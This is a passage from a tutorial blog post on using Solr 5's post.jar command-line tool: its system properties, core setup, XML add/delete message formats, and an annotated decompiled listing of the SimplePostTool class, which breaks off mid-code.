lxwt909

Learning Solr 5 with Yida: Getting the Most out of post.jar

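To make it easy to add documents to a Solr index, Solr ships with a tool called post.jar. You run it from the command line with a few parameters to add, update, or delete indexed documents. Keep in mind that it is only a tool for testing Solr. Its usage message is as follows: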

SimplePostTool version 5.1.0
Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]

Supported System Properties and their defaults:
  -Dc=<core/collection>
  -Durl=<base Solr update URL> (overrides -Dc option if specified)
  -Ddata=files|web|args|stdin (default=files)
  -Dtype=<content-type> (default=application/xml)
  -Dhost=<host> (default: localhost)
  -Dport=<port> (default: 8983)
  -Dauto=yes|no (default=no)
  -Drecursive=yes|no|<depth> (default=0)
  -Ddelay=<seconds> (default=0 for files, 10 for web)
  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)
  -Dparams="<key>=<value>[&<key>=<value>...]" (values must be URL-encoded)
  -Dcommit=yes|no (default=yes)
  -Doptimize=yes|no (default=no)
  -Dout=yes|no (default=no)

This is a simple command line tool for POSTing raw data to a Solr port.
NOTE: Specifying the url/core/collection name is mandatory.
Data can be read from files specified as commandline args,
URLs specified as args, as raw commandline arg strings or via STDIN.
Examples:
  java -Dc=gettingstarted -jar post.jar *.xml
  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'
  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml
  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/
  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv
  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json
  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf
  java -Dauto -Dc=gettingstarted -jar post.jar *
  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder
  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder
The options controlled by System Properties include the Solr
URL to POST to, the Content-Type of the data, whether a commit
or optimize should be executed, and whether the response should
be written to STDOUT. If auto=yes the tool will try to set type
automatically from file name. When posting rich documents the
file name will be propagated as "resource.name" and also used
as "literal.id". You may override these or any other request parameter
through the -Dparams property. To do a commit only, use "-" as argument.
The web mode is a simple crawler following links within domain, default delay=10s.

The key part is this line:

java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]

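To read this usage pattern you need to know a few conventions. Parameters wrapped in square brackets are optional, that is, they may be present or omitted, and | means "or". SystemProperties stands for system properties. What is a system property? It is a parameter that you set through System.setProperty(), for example: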

System.setProperty(key,value);

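The key and value here are arbitrary, with no special requirements. You can later read the value at any time with System.getProperty(key). On the command line you can set the same property with java -Dkey=value. That covers the java [SystemProperties] part. The -jar that follows is an option of the java command that runs a jar file; it takes the path of the jar, which is resolved relative to the current directory by default. Passing -h prints the usage help, much like java -h does. The trailing file, folder, url, and arg describe the different forms the submitted data can take: file means the data lives in a file; folder means it lives in the files under a folder; url means it is a resource on the Internet identified by a URL, which might be an HTML page, a PDF file, an image, and so on; arg means you type the data directly on the command line. An arg cannot be just any string, though: it must follow a fixed format that Solr can parse, which is covered later.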
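As a minimal sketch of the mechanism just described, the following Java class reads a property with a fallback value, much as post.jar reads its options. The class name SystemPropertyDemo and the property names demo.host and demo.port are made up for illustration; they are not properties that post.jar itself reads.

```java
// Sketch only: shows how a -D flag on the command line surfaces as a system property.
final class SystemPropertyDemo {

    /** Reads a system property, falling back to a default when it was never set. */
    static String read(String key, String defaultValue) {
        return System.getProperty(key, defaultValue);
    }

    public static void main(String[] args) {
        // Has the same effect as launching with: java -Ddemo.host=solr01 SystemPropertyDemo
        System.setProperty("demo.host", "solr01");

        // demo.host was set above, so its value is returned.
        System.out.println(read("demo.host", "localhost"));
        // demo.port was never set, so the default is returned.
        System.out.println(read("demo.port", "8983"));
    }
}
```

Running the class with java -Ddemo.port=8080 SystemPropertyDemo would make the second lookup return the value from the command line instead of the default.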

Supported System Properties and their defaults:

Below this line the usage message lists the system properties that post.jar supports. I will explain each of them in turn:

   -Dc=<core/collection>
  -Durl=<base Solr update URL> (overrides -Dc option if specified)
  -Ddata=files|web|args|stdin (default=files)
  -Dtype=<content-type> (default=application/xml)
  -Dhost=<host> (default: localhost)
  -Dport=<port> (default: 8983)
  -Dauto=yes|no (default=no)
  -Drecursive=yes|no|<depth> (default=0)
  -Ddelay=<seconds> (default=0 for files, 10 for web)
  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)
  -Dparams="<key>=<value>[&<key>=<value>...]" (values must be URL-encoded)
  -Dcommit=yes|no (default=yes)
  -Doptimize=yes|no (default=no)
  -Dout=yes|no (default=no)

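-D is the fixed prefix for setting a system property on the command line.

c is the core name, that is, which core in Solr you want to add, update, or delete index data in.

url is the Solr update request URL. Its format is fixed, normally http://host:port/solr/${coreName}/update, where ${coreName} matches the value of the c property. If url is given, it overrides c.

data selects how the data is supplied. files means the data is in files.

web means the data is a resource on the Internet identified by a URL.

args means you type the data directly after the post.jar command.

stdin means the data is read from the standard input stream (System.in). It resembles args, except that in stdin mode nothing needs to follow post.jar on the command line: the program reads standard input until it ends, so you either redirect a file into it (as in post.jar < hd.xml) or type the data and then signal end of input. If no input ever arrives, post.jar blocks and keeps waiting. In args mode the data is given right after post.jar and there is no such wait.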

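type is the MIME type of the data you submit. The default is application/xml, so the data is treated as XML unless you say otherwise.

host is the host name or IP address of the server where Solr is deployed. The default is localhost.

port is the port that Solr's web container listens on. post.jar defaults to 8983; the value you need depends on your actual deployment.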

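auto controls whether the file type is guessed automatically from the file name.

recursive controls recursion, and it has two meanings. With data=files and a folder argument it controls whether the files in subfolders are posted as well; with data=web it controls whether links are crawled recursively. no disables recursion, and a number sets the recursion depth.

delay is the pause between posts, in seconds, and it also has two cases. When you post files the default is 0, meaning no delay. When you post URL resources from the web, the target server may limit access, so the crawl rate has to be throttled by sleeping after each fetch (10 seconds by default); crawling too fast is likely to get your IP blocked.

filetypes lists the file types post.jar will submit. The defaults are shown above; set this property if you want to override them.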

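params holds request parameters to append to the Solr request URL, such as id=1&name=yida.

commit controls whether a commit is sent to Solr after posting. no means no commit is sent. yes does not necessarily mean the index ends up on disk, though: that depends on the directory implementation configured in solrconfig.xml. With RAMDirectory, for instance, everything stays in memory.

optimize controls whether the index is optimized afterwards. The default is no, meaning no optimization.

out controls where the response returned by Solr goes. With out=yes the response is written to System.out, that is, printed to the console; with the default no it is not printed.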
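The way c, host, port, and url combine can be sketched as follows. The logic mirrors the parseArgsAndInit method in the SimplePostTool source listed later in this post; the class name UpdateUrlDemo and the method name resolveUpdateUrl are hypothetical, introduced only for illustration.

```java
import java.util.Locale;

// Sketch only: how the target update URL is chosen from the url, host, port and c properties.
final class UpdateUrlDemo {

    /**
     * Returns the explicit url when one is given; otherwise builds the default
     * update URL from host, port and core. Either url or core must be present.
     */
    static String resolveUpdateUrl(String url, String host, String port, String core) {
        if (url == null && core == null) {
            throw new IllegalArgumentException("Specifying either url or core/collection is mandatory.");
        }
        if (url != null) {
            return url; // -Durl overrides -Dc
        }
        return String.format(Locale.ROOT, "http://%s:%s/solr/%s/update", host, port, core);
    }

    public static void main(String[] args) {
        String url = resolveUpdateUrl(
                System.getProperty("url"),
                System.getProperty("host", "localhost"),
                System.getProperty("port", "8983"),
                System.getProperty("c", "gettingstarted")); // fallback core used only by this demo
        System.out.println(url);
    }
}
```

Note that the real tool has no fallback for c; the "gettingstarted" default in main exists only so the demo runs without arguments.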

With the explanations above in mind, take another look at the official post.jar examples. They should be easy to follow now:

Examples:
  java -Dc=gettingstarted -jar post.jar *.xml
  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'
  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml
  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/
  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv
  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json
  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf
  java -Dauto -Dc=gettingstarted -jar post.jar *
  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder
  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder
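Several of the examples above pass -Dauto or -Drecursive with no value. A property given as -Dname without =value is set to the empty string, and the tool's flag check treats the empty string as on. Here is a small sketch of that parsing, modeled on the isOn method and the recursive handling in the SimplePostTool source listed later; the class name FlagParsingDemo and the method name recursiveDepth are assumptions of this sketch.

```java
// Sketch only: how yes/no style flags and the recursive option are interpreted.
final class FlagParsingDemo {

    /** True when the value occurs as a substring of "true,on,yes,1"; the empty string matches too. */
    static boolean isOn(String value) {
        return "true,on,yes,1".indexOf(value) > -1;
    }

    /**
     * A number is taken as the depth. Any other "on" value means depth 1 in
     * web mode and 999 in other modes. Everything else means no recursion.
     */
    static int recursiveDepth(String value, String mode) {
        try {
            return Integer.parseInt(value);
        } catch (NumberFormatException e) {
            if (isOn(value)) {
                return "web".equals(mode) ? 1 : 999;
            }
            return 0;
        }
    }

    public static void main(String[] args) {
        System.out.println(isOn(""));                    // the value produced by a bare -Dauto
        System.out.println(recursiveDepth("", "files")); // the value produced by a bare -Drecursive
        System.out.println(recursiveDepth("2", "web"));
    }
}
```

Because the check is a substring match, fragments such as "es" also count as on, so it is safest to stick to the documented yes and no values.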

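OK, now that you know how post.jar works, let's put it into practice. To add index data to Solr you first need a core. You can create one through the Solr Admin web UI, as shown in the figure:

instanceDir is the root directory of your core, and solr_home is your SOLR_HOME. You can create several core directories under SOLR_HOME. dataDir is the data directory of the core; the core's index data is stored in the data\index directory under it. You have to create all of these folders by hand, except the index directory inside data\index, which Solr creates automatically, as shown in the figure:

The solr_home directory needs a solr.xml. You can take this configuration file from the Solr zip package, as shown in the figure:

Find solr.xml as shown and copy it to the root of your own solr_home. Your core directory then needs a conf directory to hold the Solr configuration for that core. These configuration files can be found in the Solr examples, as shown in the figure:

solrconfig.xml is required for every core and applies only to that core. schema.xml defines the fields of the index: the field name, the field type, whether the field is indexed, stored, or tokenized, whether term vectors are stored, which analyzer to use, where the synonym dictionary file is, where the stop word dictionary file is, and so on. All of this is defined in schema.xml. If you have some Lucene background, writing schema.xml is straightforward: what you used to define through the Lucene API is now expressed in XML. Note that there is also a protwords.txt dictionary file, which we have not come across in Lucene so far. Here is an explanation of protwords.txt: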

Protwords are the words which you do not want to be stemmed (In stemming
case manager/managing/managed/manageable all are indexed as ---> manag. Same
thing goes in case of searching. In case you do not want a particular word
to be stemmed at index/search time just put it in protwords.txt of SOLR.

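In short, protwords are the words you do not want to be stemmed. With stemming enabled, words such as manager/managing/managed/manageable are all indexed as manag. If you do not want a particular word to be stemmed (reduced to its root form), put it in protwords.txt and it will be left as is.

prot is short for protected. Stemming applies to inflected languages such as English.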

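That completes the core directory structure. If you do not follow this layout, creating the core will fail; for example, you may run into an exception like this:

After the core is created successfully, the Solr Admin UI looks like this:

You can of course also create a core by entering a URL directly in the browser: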

http://localhost:8080/solr/admin/cores?action=CREATE&name=core2&instanceDir=/opt/solr/core2&config=solrconfig.xml&schema=schema.xml&dataDir=data

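name is the name of your core.

instanceDir is the root directory of your core, for example /opt/solr/core2 on Linux or C:/solr/core2 on Windows.

config and schema are the names of the core's two key configuration files. As long as the core directory follows the layout described above, Solr looks for the files with these names in the conf directory. dataDir is the data directory of your core, which mainly stores the core's index data.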
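If you would rather assemble such a URL in code than type it, a rough sketch could look like this. It only builds the string with URL-encoded parameters; it does not send the request. The class name CoreCreateUrlDemo and its methods are hypothetical, and the base URL and parameter values are simply the ones from the example above.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.util.LinkedHashMap;
import java.util.Map;

// Sketch only: builds a core CREATE URL like the one shown above; no request is sent.
final class CoreCreateUrlDemo {

    /** URL-encodes a single key or value as UTF-8. */
    static String enc(String s) {
        try {
            return URLEncoder.encode(s, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException(e); // UTF-8 is always available
        }
    }

    /** Appends action=CREATE plus the given parameters, in insertion order, to the base URL. */
    static String buildCreateUrl(String solrBaseUrl, Map<String, String> params) {
        StringBuilder sb = new StringBuilder(solrBaseUrl).append("/admin/cores?action=CREATE");
        for (Map.Entry<String, String> e : params.entrySet()) {
            sb.append('&').append(enc(e.getKey())).append('=').append(enc(e.getValue()));
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        Map<String, String> params = new LinkedHashMap<>();
        params.put("name", "core2");
        params.put("instanceDir", "/opt/solr/core2");
        params.put("config", "solrconfig.xml");
        params.put("schema", "schema.xml");
        params.put("dataDir", "data");
        System.out.println(buildCreateUrl("http://localhost:8080/solr", params));
    }
}
```

The encoded form differs from the hand-typed URL only in that the slashes in instanceDir appear as %2F, which denotes the same value.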

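With the core created, you can run post.jar from the command line to add documents to the index. First change to the directory that contains post.jar, as shown in the figure:

Before running post.jar we need an XML file to test with. Here I use one of the XML files from Solr's examples directory, as shown in the figure:

Then refresh the Solr Admin web UI and check whether the document count of core-c has changed, as shown in the figure:

Note, however, that not every XML file can be indexed. The submitted XML must follow a fixed format. Open the XML file we just posted, as shown in the figure: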

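<add> means add documents to the index, each <doc></doc> pair is one Lucene Document, and field is a field: name is the field name and the text between the field tags is the field value. A message has only one <add> tag, which may contain multiple <doc> tags; multiple <doc> tags add a batch of documents.

The <add> tag also has two optional attributes:

overwrite: "true" | "false", default true. It controls whether a document replaces an existing document that has the same uniqueKey. The uniqueKey is the document's unique key, similar to the primary key of a database table.

commitWithin: the added documents will be committed within the given number of milliseconds.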
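To make the format concrete, here is a minimal sketch that assembles an <add> message for a single document from a map of field names to values. It escapes XML special characters by hand and is not how Solr or post.jar builds messages; the class name AddXmlDemo and its methods are hypothetical, and the field names are borrowed from the examples in this post.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Sketch only: builds a one-document <add> message as a string.
final class AddXmlDemo {

    /** Escapes the characters that are special in XML text and attribute values. */
    static String escape(String s) {
        return s.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;");
    }

    /** Wraps the fields in <add commitWithin="..."><doc>...</doc></add>. */
    static String buildAdd(Map<String, String> fields, int commitWithinMs) {
        StringBuilder sb = new StringBuilder();
        sb.append("<add commitWithin=\"").append(commitWithinMs).append("\"><doc>");
        for (Map.Entry<String, String> f : fields.entrySet()) {
            sb.append("<field name=\"").append(escape(f.getKey())).append("\">")
              .append(escape(f.getValue()))
              .append("</field>");
        }
        return sb.append("</doc></add>").toString();
    }

    public static void main(String[] args) {
        Map<String, String> fields = new LinkedHashMap<>();
        fields.put("employeeId", "05991");
        fields.put("office", "Bridgewater");
        System.out.println(buildAdd(fields, 5000));
    }
}
```

The resulting string could be passed to post.jar in args mode (-Ddata=args), provided the field names exist in the core's schema.xml.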

You can also set a boost on a document or on an individual field, for example:

<add>
  <doc boost="2.5">
    <field name="employeeId">05991</field>
    <field name="office" boost="2.0">Bridgewater</field>
  </doc>
</add>

How do you set multiple values on a multi-valued field?

<add>
  <doc>
    <field name="employeeId">05991</field>
    <field name="skills" update="set">Python</field>
    <field name="skills" update="set">Java</field>
    <field name="skills" update="set">Jython</field>
  </doc>
</add>

How do you set a field's value to null?

<add>
  <doc>
    <field name="employeeId">05991</field>
    <field name="skills" update="set" null="true" />
  </doc>
</add>

You can also send the following commands to the update handler:

<commit/>
<optimize/>

They are similar to explicitly calling writer.commit() and writer.optimize() in Lucene (optimize() was renamed forceMerge() in later Lucene versions).

How do you delete a document by ID? (The id here refers to the field designated as uniqueKey, which is defined in schema.xml. Do not confuse it with Lucene's internal document ID.)

<delete><id>05991</id></delete>

How do you delete documents by query?

<delete><query>office:Bridgewater</query></delete>

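office is the field name and Bridgewater is the field value. By default this yields a TermQuery. The value may contain wildcards, be a regular expression, or be any expression the QueryParser accepts.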

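Everything above runs from the command line. If you find that inconvenient, you can also work in Eclipse. Decompiling post.jar shows that it contains essentially a single class, SimplePostTool. I spent some time reading its source code and annotated the key places. The source is as follows: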

package com.yida.framework.solr5.test;

import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileFilter;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.BufferOverflowException;
import java.nio.ByteBuffer;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.HashSet;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.TimeZone;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;
import java.util.zip.GZIPInputStream;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;

import javax.xml.bind.DatatypeConverter;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;

import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;
/**
 * A small test tool for posting index data to Solr
 * @author Lanxiaowei
 *
 */
@SuppressWarnings("unused")
public class SimplePostTool {
	/** Host name or IP address of the server running Solr; defaults to localhost */
	private static final String DEFAULT_POST_HOST = "localhost";
	/** Port the Solr web container listens on; defaults to 8983 */
	private static final String DEFAULT_POST_PORT = "8983";
	/** Version of this tool */
	private static final String VERSION_OF_THIS_TOOL = "5.1.0";
	/** Whether to commit after posting */
	private static final String DEFAULT_COMMIT = "yes";
	/** Whether to optimize the index after posting */
	private static final String DEFAULT_OPTIMIZE = "no";
	/** Whether to write Solr's response to System.out, i.e. the console */
	private static final String DEFAULT_OUT = "no";
	/** Whether to guess the MIME type automatically, based on the file name extension */
	private static final String DEFAULT_AUTO = "no";
	/** Default recursion depth; 0 means no recursion */
	private static final String DEFAULT_RECURSIVE = "0";
	/** Crawl delay in web mode: seconds to sleep after each fetched URL */
	private static final int DEFAULT_WEB_DELAY = 10;
	/** Default delay between posted files, in milliseconds */
	private static final int DEFAULT_POST_DELAY = 10;
	/** Maximum crawl depth allowed in web mode */
	private static final int MAX_WEB_DEPTH = 10;
	/** Default MIME type */
	private static final String DEFAULT_CONTENT_TYPE = "application/xml";
	/** File types posted by default */
	private static final String DEFAULT_FILE_TYPES = "xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log";
	/** files mode: the data is read from files */
	static final String DATA_MODE_FILES = "files";
	/** args mode: the data is passed directly as command-line arguments */
	static final String DATA_MODE_ARGS = "args";
	/** stdin mode: the data is read from standard input, so the program waits until input arrives */
	static final String DATA_MODE_STDIN = "stdin";
	/** web mode: the user supplies page URLs to crawl; the tool fetches the page content and posts it */
	static final String DATA_MODE_WEB = "web";
	/** The default mode is files, i.e. posting files */
	static final String DEFAULT_DATA_MODE = "files";
	boolean auto = false;
	int recursive = 0;
	int delay = 0;
	String fileTypes;
	URL solrUrl;
	OutputStream out = null;
	String type;
	String mode;
	boolean commit;
	boolean optimize;
	String[] args;
	private int currentDepth;
	static HashMap<String, String> mimeMap;
	GlobFileFilter globFileFilter;
	//URL sets per crawl depth; the list index is the depth
	List<LinkedHashSet<URL>> backlog = new ArrayList<LinkedHashSet<URL>>();
	//URLs that have already been crawled
	Set<URL> visited = new HashSet<URL>();

	static final Set<String> DATA_MODES = new HashSet<String>();
	static final String USAGE_STRING_SHORT = "Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]";
	static boolean mockMode = false;
	static PageFetcher pageFetcher;

	public static void main(String[] args) {
		String coreName = "core-test";
		System.setProperty("c",coreName);
		
		info("SimplePostTool version 5.1.0");
		if ((0 < args.length)
				&& (("-help".equals(args[0])) || ("--help".equals(args[0])) || ("-h"
						.equals(args[0])))) {
			//Print the post.jar usage help
			usage();
		} else {
			SimplePostTool t = parseArgsAndInit(args);
			t.execute();
		}
	}

	public void execute() {
		long startTime = System.currentTimeMillis();
		if (("files".equals(this.mode)) && (this.args.length > 0)) {
			doFilesMode();
		} else if (("args".equals(this.mode)) && (this.args.length > 0)) {
			doArgsMode();
		} else if (("web".equals(this.mode)) && (this.args.length > 0)) {
			doWebMode();
		} else if ("stdin".equals(this.mode)) {
			doStdinMode();
		} else {
			usageShort();
			return;
		}

		if (this.commit)
			commit();
		if (this.optimize)
			optimize();
		long endTime = System.currentTimeMillis();
		displayTiming(endTime - startTime);
	}

	private void displayTiming(long millis) {
		SimpleDateFormat df = new SimpleDateFormat("H:mm:ss.SSS",
				Locale.getDefault());
		df.setTimeZone(TimeZone.getTimeZone("UTC"));
		System.out.println(new StringBuilder().append("Time spent: ")
				.append(df.format(new Date(millis))).toString());
	}

	protected static SimplePostTool parseArgsAndInit(String[] args) {
		String urlStr = null;
		try {
			String mode = System.getProperty("data", "files");
			if (!DATA_MODES.contains(mode)) {
				fatal(new StringBuilder()
						.append("System Property 'data' is not valid for this tool: ")
						.append(mode).toString());
			}

			//Request parameters to append to the Solr request URL
			String params = System.getProperty("params", "");

			String host = System.getProperty("host", DEFAULT_POST_HOST);
			String port = System.getProperty("port", DEFAULT_POST_PORT);
			String core = System.getProperty("c");

			urlStr = System.getProperty("url");

			if ((urlStr == null) && (core == null)) {
				fatal("Specifying either url or core/collection is mandatory.\nUsage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]");
			}

			//If no Solr request URL was given, build the default one
			if (urlStr == null) {
				urlStr = String.format(Locale.ROOT,
						"http://%s:%s/solr/%s/update", new Object[] { host,
								port, core });
			}
			urlStr = appendParam(urlStr, params);
			URL url = new URL(urlStr);
			boolean auto = isOn(System.getProperty("auto", DEFAULT_AUTO));
			String type = System.getProperty("type");

			int recursive = 0;
			String r = System.getProperty("recursive", DEFAULT_RECURSIVE);
			try {
				recursive = Integer.parseInt(r);
			} catch (Exception e) {
				if (isOn(r)) {
					recursive = "web".equals(mode) ? 1 : 999;
				}
			}
			int delay = "web".equals(mode) ? DEFAULT_WEB_DELAY : 0;
			try {
				delay = Integer.parseInt(System
						.getProperty("delay", delay + ""));
			} catch (Exception e) {
			}
			OutputStream out = isOn(System.getProperty("out", DEFAULT_OUT)) ? System.out
					: null;
			String fileTypes = System.getProperty("filetypes",DEFAULT_FILE_TYPES);
			boolean commit = isOn(System.getProperty("commit", DEFAULT_COMMIT));
			boolean optimize = isOn(System.getProperty("optimize", DEFAULT_OPTIMIZE));

			return new SimplePostTool(mode, url, auto, type, recursive, delay,
					fileTypes, out, commit, optimize, args);
		} catch (MalformedURLException e) {
			fatal(new StringBuilder()
					.append("System Property 'url' is not a valid URL: ")
					.append(urlStr).toString());
		}
		return null;
	}

	public SimplePostTool(String mode, URL url, boolean auto, String type,
			int recursive, int delay, String fileTypes, OutputStream out,
			boolean commit, boolean optimize, String[] args) {
		this.mode = mode;
		this.solrUrl = url;
		this.auto = auto;
		this.type = type;
		this.recursive = recursive;
		this.delay = delay;
		this.fileTypes = fileTypes;
		this.globFileFilter = getFileFilterFromFileTypes(fileTypes);
		this.out = out;
		this.commit = commit;
		this.optimize = optimize;
		this.args = args;
		pageFetcher = new PageFetcher();
	}

	public SimplePostTool() {
	}

	/**
	 * Files mode: the data to index is in files. Each argument can be a directory, a file path, or a glob such as xxxx\*.xml
	 */
	private void doFilesMode() {
		this.currentDepth = 0;

		if (!this.args[0].equals("-")) {
			info(new StringBuilder()
					.append("Posting files to [base] url ")
					.append(this.solrUrl)
					.append(!this.auto ? new StringBuilder()
							.append(" using content-type ")
							.append(this.type == null ? DEFAULT_CONTENT_TYPE
									: this.type).toString() : "").append("...")
					.toString());
			if (this.auto)
				info(new StringBuilder()
						.append("Entering auto mode. File endings considered are ")
						.append(this.fileTypes).toString());
			if (this.recursive > 0)
				info(new StringBuilder()
						.append("Entering recursive mode, max depth=")
						.append(this.recursive).append(", delay=")
						.append(this.delay).append("s").toString());
			int numFilesPosted = postFiles(this.args, 0, this.out, this.type);
			info(new StringBuilder().append(numFilesPosted)
					.append(" files indexed.").toString());
		}
	}

	/**
	 * Args mode: each command-line argument is POSTed to Solr as is
	 */
	private void doArgsMode() {
		info(new StringBuilder().append("POSTing args to ")
				.append(this.solrUrl).append("...").toString());
		for (String a : this.args) {
			postData(stringToStream(a), null, this.out, this.type, this.solrUrl);
		}
	}

	/**
	 * Web mode: the data is on the Internet; pages are fetched on the fly and then posted
	 * @return number of pages posted
	 */
	private int doWebMode() {
		reset();
		int numPagesPosted = 0;
		try {
			if (this.type != null) {
				fatal("Specifying content-type with \"-Ddata=web\" is not supported");
			}
			if (this.args[0].equals("-")) {
				return 0;
			}

			this.solrUrl = appendUrlPath(this.solrUrl, "/extract");

			info(new StringBuilder().append("Posting web pages to Solr url ")
					.append(this.solrUrl).toString());
			this.auto = true;
			info(new StringBuilder()
					.append("Entering auto mode. Indexing pages with content-types corresponding to file endings ")
					.append(this.fileTypes).toString());
			if (this.recursive > 0) {
				if (this.recursive > MAX_WEB_DEPTH) {
					this.recursive = MAX_WEB_DEPTH;
					warn("Too large recursion depth for web mode, limiting to 10...");
				}
				if (this.delay < DEFAULT_WEB_DELAY)
					warn("Never crawl an external web site faster than every "+DEFAULT_WEB_DELAY+" seconds, your IP will probably be blocked");
				info(new StringBuilder()
						.append("Entering recursive mode, depth=")
						.append(this.recursive).append(", delay=")
						.append(this.delay).append("s").toString());
			}
			numPagesPosted = postWebPages(this.args, 0, this.out);
			info(new StringBuilder().append(numPagesPosted)
					.append(" web pages indexed.").toString());
		} catch (MalformedURLException e) {
			fatal(new StringBuilder()
					.append("Wrong URL trying to append /extract to ")
					.append(this.solrUrl).toString());
		}
		return numPagesPosted;
	}

	private void doStdinMode() {
		info(new StringBuilder().append("POSTing stdin to ")
				.append(this.solrUrl).append("...").toString());
		postData(System.in, null, this.out, this.type, this.solrUrl);
	}

	private void reset() {
		this.fileTypes = "xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log";
		this.globFileFilter = getFileFilterFromFileTypes(this.fileTypes);
		this.backlog = new ArrayList<LinkedHashSet<URL>>();
		this.visited = new HashSet<URL>();
	}

	/**
	 * Print the short usage line
	 */
	private static void usageShort() {
		System.out
				.println("Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]\n       Please invoke with -h option for extended usage help.");
	}

	/**
	 * Print the full usage help
	 */
	private static void usage() {
		System.out
				.println("Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]\n\n"
						+ "Supported System Properties and their defaults:\n"
						+ "  -Dc=<core/collection>\n"
						+ "  -Durl=<base Solr update URL> (overrides -Dc option if specified)\n"
						+ "  -Ddata=files|web|args|stdin (default=files)\n"
						+ "  -Dtype=<content-type> (default=application/xml)\n"
						+ "  -Dhost=<host> (default: localhost)\n"
						+ "  -Dport=<port> (default: " + DEFAULT_POST_PORT + ")\n"
						+ "  -Dauto=yes|no (default=no)\n"
						+ "  -Drecursive=yes|no|<depth> (default=0)\n"
						+ "  -Ddelay=<seconds> (default=0 for files, 10 for web)\n"
						+ "  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)\n"
						+ "  -Dparams=\"<key>=<value>[&<key>=<value>...]\" (values must be URL-encoded)\n"
						+ "  -Dcommit=yes|no (default=yes)\n"
						+ "  -Doptimize=yes|no (default=no)\n"
						+ "  -Dout=yes|no (default=no)\n\n"
						+ "This is a simple command line tool for POSTing raw data to a Solr port.\n"
						+ "NOTE: Specifying the url/core/collection name is mandatory.\n"
						+ "Data can be read from files specified as commandline args,\n"
						+ "URLs specified as args, as raw commandline arg strings or via STDIN.\n"
						+ "Examples:\n"
						+ "  java -Dc=gettingstarted -jar post.jar *.xml\n"
						+ "  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'\n"
						+ "  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml\n"
						+ "  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/\n"
						+ "  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv\n"
						+ "  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json\n"
						+ "  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf\n"
						+ "  java -Dauto -Dc=gettingstarted -jar post.jar *\n"
						+ "  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder\n"
						+ "  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder\n"
						+ "The options controlled by System Properties include the Solr\n"
						+ "URL to POST to, the Content-Type of the data, whether a commit\n"
						+ "or optimize should be executed, and whether the response should\n"
